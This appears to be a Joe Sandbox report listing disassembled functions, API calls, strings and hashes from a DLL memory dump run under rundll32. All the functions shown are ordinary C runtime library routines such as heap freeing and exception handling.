Function 6EC4DDF0 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 6EC4DE34

Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E24D
Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E25F
Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E271
Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E283
Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E295
Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E2A7
Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E2B9
Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E2CB
Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E2DD
Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E2EF
Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E301
Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E313
Part of subcall function 6EC4E230: _free.LIBCMT ref: 6EC4E325

_free.LIBCMT ref: 6EC4DE29

Part of subcall function 6EC4B90F: HeapFree.KERNEL32(00000000,00000000,?,6EC4AB0E), ref: 6EC4B925
Part of subcall function 6EC4B90F: GetLastError.KERNEL32(?,?,6EC4AB0E), ref: 6EC4B937

_free.LIBCMT ref: 6EC4DE4B
_free.LIBCMT ref: 6EC4DE60
_free.LIBCMT ref: 6EC4DE6B
_free.LIBCMT ref: 6EC4DE8D
_free.LIBCMT ref: 6EC4DEA0
_free.LIBCMT ref: 6EC4DEAE
_free.LIBCMT ref: 6EC4DEB9
_free.LIBCMT ref: 6EC4DEF1
_free.LIBCMT ref: 6EC4DEF8
_free.LIBCMT ref: 6EC4DF15
_free.LIBCMT ref: 6EC4DF2D

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 3f1209e510257b399763bff0af006d841de693258d541d090043124c2ba6447e
Instruction ID: cf0a21f93f013f692f3fd59be155e903d636172f09aa63ea5b160b9872398581
Opcode Fuzzy Hash: 3f1209e510257b399763bff0af006d841de693258d541d090043124c2ba6447e
Instruction Fuzzy Hash: 38314C72604205DFEB61AEB9D840B9A7BF9AF11354F109829E495D7198FF32ED90CB20

Function 6EC482C0 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6EC483BD
type_info::operator==.LIBVCRUNTIME ref: 6EC483DF
___TypeMatch.LIBVCRUNTIME ref: 6EC484EE
IsInExceptionSpec.LIBVCRUNTIME ref: 6EC485C0
_UnwindNestedFrames.LIBCMT ref: 6EC48644
CallUnexpected.LIBVCRUNTIME ref: 6EC4865F

Strings

csm, xrefs: 6EC48416
csm, xrefs: 6EC482FD
csm, xrefs: 6EC4836A

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 2817b205edd786707feb20e9b839bc636f79d4718342dd3834a5cb6f69a54d7c
Instruction ID: 0de38fb79c00bd42073a957eb609be4a5476be9559f808445b00d8db9b59c0e3
Opcode Fuzzy Hash: 2817b205edd786707feb20e9b839bc636f79d4718342dd3834a5cb6f69a54d7c
Instruction Fuzzy Hash: 00B1437280020AEFDF45CFE8D890E9EBBB9BF05314B10455AF8116B259E335DA52DBD1

Function 6EC4B188 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6EC4B19E

Part of subcall function 6EC4B90F: HeapFree.KERNEL32(00000000,00000000,?,6EC4AB0E), ref: 6EC4B925
Part of subcall function 6EC4B90F: GetLastError.KERNEL32(?,?,6EC4AB0E), ref: 6EC4B937

_free.LIBCMT ref: 6EC4B1AA
_free.LIBCMT ref: 6EC4B1B5
_free.LIBCMT ref: 6EC4B1C0
_free.LIBCMT ref: 6EC4B1CB
_free.LIBCMT ref: 6EC4B1D6
_free.LIBCMT ref: 6EC4B1E1
_free.LIBCMT ref: 6EC4B1EC
_free.LIBCMT ref: 6EC4B1F7
_free.LIBCMT ref: 6EC4B205

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 197bed687a609df6c74633c12f0a4743440c8f132b60981083006bad36b6299a
Instruction ID: 7462df84dbcbbe12891deacc2d708393c8fb74034c844e2d89fd0fa7ea084ce6
Opcode Fuzzy Hash: 197bed687a609df6c74633c12f0a4743440c8f132b60981083006bad36b6299a
Instruction Fuzzy Hash: 6921667690410CEFCB41EFD4C880DDE7BB9AF18244F0185A6E5659B125EB32EB549B80

Function 6EC47C10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6EC47C47
___except_validate_context_record.LIBVCRUNTIME ref: 6EC47C4F
_ValidateLocalCookies.LIBCMT ref: 6EC47CD8
__IsNonwritableInCurrentImage.LIBCMT ref: 6EC47D03
_ValidateLocalCookies.LIBCMT ref: 6EC47D58

Strings

csm, xrefs: 6EC47CED

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 69fd1bfa55e94afeef1c325459d507bc03279ce2f1966147d18af7cecfc4d3fe
Instruction ID: 705981f842d9c66f07f751a053eb0d374373624731510c8bbba18037f844469a
Opcode Fuzzy Hash: 69fd1bfa55e94afeef1c325459d507bc03279ce2f1966147d18af7cecfc4d3fe
Instruction Fuzzy Hash: 2541AF35A00209DFCF00DFA8C890EDEBBB9BF45328F108495E8246B395E731AA15DBD1

Function 6EC4CE36 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 6EC4CE8D
ext-ms-, xrefs: 6EC4CEA1

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 0e07519c7c299091978b6ca8f9b34c15a2de5df30a5e5f51835d51ca7b842118
Instruction ID: a6ca8ff5f9863a3d51e4875ff973800f3c591249a26f37deb551665eb747e751
Opcode Fuzzy Hash: 0e07519c7c299091978b6ca8f9b34c15a2de5df30a5e5f51835d51ca7b842118
Instruction Fuzzy Hash: 8A21E432B55621EBFB518AEA8C40F4B3778AB427A0F110120E921FF2A4F730ED14C6E4

Function 6EC4E3CF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6EC4E397: _free.LIBCMT ref: 6EC4E3BC

_free.LIBCMT ref: 6EC4E41D

Part of subcall function 6EC4B90F: HeapFree.KERNEL32(00000000,00000000,?,6EC4AB0E), ref: 6EC4B925
Part of subcall function 6EC4B90F: GetLastError.KERNEL32(?,?,6EC4AB0E), ref: 6EC4B937

_free.LIBCMT ref: 6EC4E428
_free.LIBCMT ref: 6EC4E433
_free.LIBCMT ref: 6EC4E487
_free.LIBCMT ref: 6EC4E492
_free.LIBCMT ref: 6EC4E49D
_free.LIBCMT ref: 6EC4E4A8

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
Instruction ID: 0ef47ef9562b14d66d88481f0294a889c697451d29212ee0a426dab9fdc059bd
Opcode Fuzzy Hash: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
Instruction Fuzzy Hash: A211FE71544B08EED621EFF0CC45FCB7FACAF04704F414C19A699AA294FB76FA148654

Function 6EC4F25C Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6EC4F2A4
__fassign.LIBCMT ref: 6EC4F489
__fassign.LIBCMT ref: 6EC4F4A6
WriteFile.KERNEL32(?,6EC4D927,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EC4F4EE
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6EC4F52E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EC4F5D6

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: bc465621cbf4c83f30835265549ab715d448638bede61aef95737c9de94e7299
Instruction ID: adf3d8665abe7dc3c731287503e53a81edcaec39460c04f3a7b8ffe36868e8af
Opcode Fuzzy Hash: bc465621cbf4c83f30835265549ab715d448638bede61aef95737c9de94e7299
Instruction Fuzzy Hash: 1DC19C75D00299DFCB14CFE8C9909EDBBB9BF49314F28916AE865B7241E7319902CF60

Function 6EC47F89 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6EC47B9E,6EC468B4,6EC46D4B,?,6EC46F85,?,00000001,?,?,00000001,?,6EC5C7F8,0000000C,6EC4707E), ref: 6EC47F97
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6EC47FA5
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6EC47FBE
SetLastError.KERNEL32(00000000,6EC46F85,?,00000001,?,?,00000001,?,6EC5C7F8,0000000C,6EC4707E,?,00000001,?), ref: 6EC48010

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ae1d9683c46111597d8c0d9ce9fc28cb2bcf5572c8f41b5ebe9abc4a210d8f6a
Instruction ID: 49a9b075ced9239b994a7f514abe36ee373b17dbb989ccea85e9ce02e6f5b2c7
Opcode Fuzzy Hash: ae1d9683c46111597d8c0d9ce9fc28cb2bcf5572c8f41b5ebe9abc4a210d8f6a
Instruction Fuzzy Hash: F601D47312CB22EEAB651AF56D88A972778EB837793200B29F530A91D8FF1148117180

Function 6EC4C17B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6EC4C180

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 4e00ef2a050066b7233e9a4c1de57b1987209e5ea60fb26d9a4ef271a2c38fe6
Instruction ID: 60240f0daf157d5c6448768d72b4d7ecf6fd7f67277be6421ed3e75fb06670f4
Opcode Fuzzy Hash: 4e00ef2a050066b7233e9a4c1de57b1987209e5ea60fb26d9a4ef271a2c38fe6
Instruction Fuzzy Hash: E6219FB1614609EFBB649EF68C80DAB77BDAF813687104915F924DB178FB70DC1887A0

Function 6EC48FF7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6EC490B8,00000000,?,00000001,00000000,?,6EC4912F,00000001,FlsFree,6EC56E3C,FlsFree,00000000), ref: 6EC49087

Strings

api-ms-, xrefs: 6EC49047

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 396575759259e1932c2b9cf5d3add8bfd89cfdb021078907e9b89e0431b1fbfa
Instruction ID: 871ae82327b0254e1242b16372e8d72f155a327d3934c6b3336a182ded2030ec
Opcode Fuzzy Hash: 396575759259e1932c2b9cf5d3add8bfd89cfdb021078907e9b89e0431b1fbfa
Instruction Fuzzy Hash: 8911A732A55A32EBDB538BA98A4474937B4AF46770F110250E931F7288F770ED1086E5

Function 6EC4A2D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6EC4A28B,?,?,6EC4A253,?,00000001,?), ref: 6EC4A2EE
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6EC4A301
FreeLibrary.KERNEL32(00000000,?,?,6EC4A28B,?,?,6EC4A253,?,00000001,?), ref: 6EC4A324

Strings

CorExitProcess, xrefs: 6EC4A2F9
mscoree.dll, xrefs: 6EC4A2E7

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: e9b52ccc20d894dd324dcd4e5d309f1852942073f240fdf24289d7a53c8899aa
Instruction ID: ebb83ae294809002cc9035ed001564a490f978706a1ce8c9f2156ed406eae4b5
Opcode Fuzzy Hash: e9b52ccc20d894dd324dcd4e5d309f1852942073f240fdf24289d7a53c8899aa
Instruction Fuzzy Hash: 24F01C31921A19FBDF019BA1C919B9E7B79EB81756F104164F412B2250FB31CA20DB99

Function 6EC4E32E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6EC4E346

Part of subcall function 6EC4B90F: HeapFree.KERNEL32(00000000,00000000,?,6EC4AB0E), ref: 6EC4B925
Part of subcall function 6EC4B90F: GetLastError.KERNEL32(?,?,6EC4AB0E), ref: 6EC4B937

_free.LIBCMT ref: 6EC4E358
_free.LIBCMT ref: 6EC4E36A
_free.LIBCMT ref: 6EC4E37C
_free.LIBCMT ref: 6EC4E38E

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9dd02f824a5cffdaddcf58e20eeac693f46146959f1cd0ee1702d5aa63c36ab5
Instruction ID: 3d005b60987006e300f838c5fbcfe343803ef3eee5a821ccdc03faf3f8230b20
Opcode Fuzzy Hash: 9dd02f824a5cffdaddcf58e20eeac693f46146959f1cd0ee1702d5aa63c36ab5
Instruction Fuzzy Hash: 8BF06D31400609DFCA55DFE8E1C0D5F33FDAA00760361AC09F018EB648EB31FC908AA0

Function 6EC4BAFF Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EC4BC99

Strings

*?, xrefs: 6EC4BB42

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 19c18ddf14ce9615cfa6117e23dcf04fce62630a8d918e35b75d869d6a8ef9cd
Instruction ID: 30f7019b06830707efa3f28094681d2a17807ff8b489ce1c3463352924e96d94
Opcode Fuzzy Hash: 19c18ddf14ce9615cfa6117e23dcf04fce62630a8d918e35b75d869d6a8ef9cd
Instruction Fuzzy Hash: 26611975E04219DFDB15CFA9C8809EDFBF9EF48314B25856AD815E7308E731AE418B90

Function 6EC48069 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6EC48130
___AdjustPointer.LIBCMT ref: 6EC48153
___AdjustPointer.LIBCMT ref: 6EC481EF

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: aacc1f966d30d9916ee7eceb16dd44610ffa4903a52712385ab4072e62ad93f7
Instruction ID: b92ade735a49dfb697bf92a3f180e9d0f9e7bebb43625d79d5feb069ccc834ba
Opcode Fuzzy Hash: aacc1f966d30d9916ee7eceb16dd44610ffa4903a52712385ab4072e62ad93f7
Instruction Fuzzy Hash: BD519BB3A05646EFEB158F95D890FAA77A8EF00314F10492AFD1257294F731E890C7D0

Function 6EC4BA13 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6EC4C035: _free.LIBCMT ref: 6EC4C043

Part of subcall function 6EC4CC09: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6EC4D927,6EC4FBE4,0000FDE9,00000000,?,?,?,6EC4F95D,0000FDE9,00000000,?), ref: 6EC4CCB5

GetLastError.KERNEL32 ref: 6EC4BA7B
__dosmaperr.LIBCMT ref: 6EC4BA82
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6EC4BAC1
__dosmaperr.LIBCMT ref: 6EC4BAC8

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 62c788800297299d2d31131cb5d49e51377abf96ca6be94c31ed67c3432f4f77
Instruction ID: 2cbe17dc171ee14f7dcf10926fe92de6a7162af58e0477722cb87689726042ad
Opcode Fuzzy Hash: 62c788800297299d2d31131cb5d49e51377abf96ca6be94c31ed67c3432f4f77
Instruction Fuzzy Hash: 5A218071604609EFAB109FE68984D9FB7FDFF453687108919F96897258FB31EC2087A0

Function 6EC4B2CC Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6EC4F6A4,?,00000001,6EC4D998,?,6EC4FB5E,00000001,?,?,?,6EC4D927,?,00000000), ref: 6EC4B2D1
_free.LIBCMT ref: 6EC4B32E
_free.LIBCMT ref: 6EC4B364
SetLastError.KERNEL32(00000000,00000006,000000FF,?,6EC4FB5E,00000001,?,?,?,6EC4D927,?,00000000,00000000,6EC5CB78,0000002C,6EC4D998), ref: 6EC4B36F

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 40532d64351cde5711df1605392b7501f88677e49cd71b9c13e4b380a99666a7
Instruction ID: 511d9c3c33f0e436d6bab508a7bf302d96cfc3e4f2ca1b8ea3a886ea7282cd2d
Opcode Fuzzy Hash: 40532d64351cde5711df1605392b7501f88677e49cd71b9c13e4b380a99666a7
Instruction Fuzzy Hash: 6111E972604B02EFDB612AFA4D80B5F267DABC2778B240E24F134A72CCFF6188115611

Function 6EC50666 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6EC500CA,?,00000001,?,00000001,?,6EC4F633,?,?,00000001), ref: 6EC5067D
GetLastError.KERNEL32(?,6EC500CA,?,00000001,?,00000001,?,6EC4F633,?,?,00000001,?,00000001,?,6EC4FB7F,6EC4D927), ref: 6EC50689

Part of subcall function 6EC5064F: CloseHandle.KERNEL32(FFFFFFFE,6EC50699,?,6EC500CA,?,00000001,?,00000001,?,6EC4F633,?,?,00000001,?,00000001), ref: 6EC5065F

___initconout.LIBCMT ref: 6EC50699

Part of subcall function 6EC50611: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6EC50640,6EC500B7,00000001,?,6EC4F633,?,?,00000001,?), ref: 6EC50624

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6EC500CA,?,00000001,?,00000001,?,6EC4F633,?,?,00000001,?), ref: 6EC506AE

Memory Dump Source

Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true

Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File

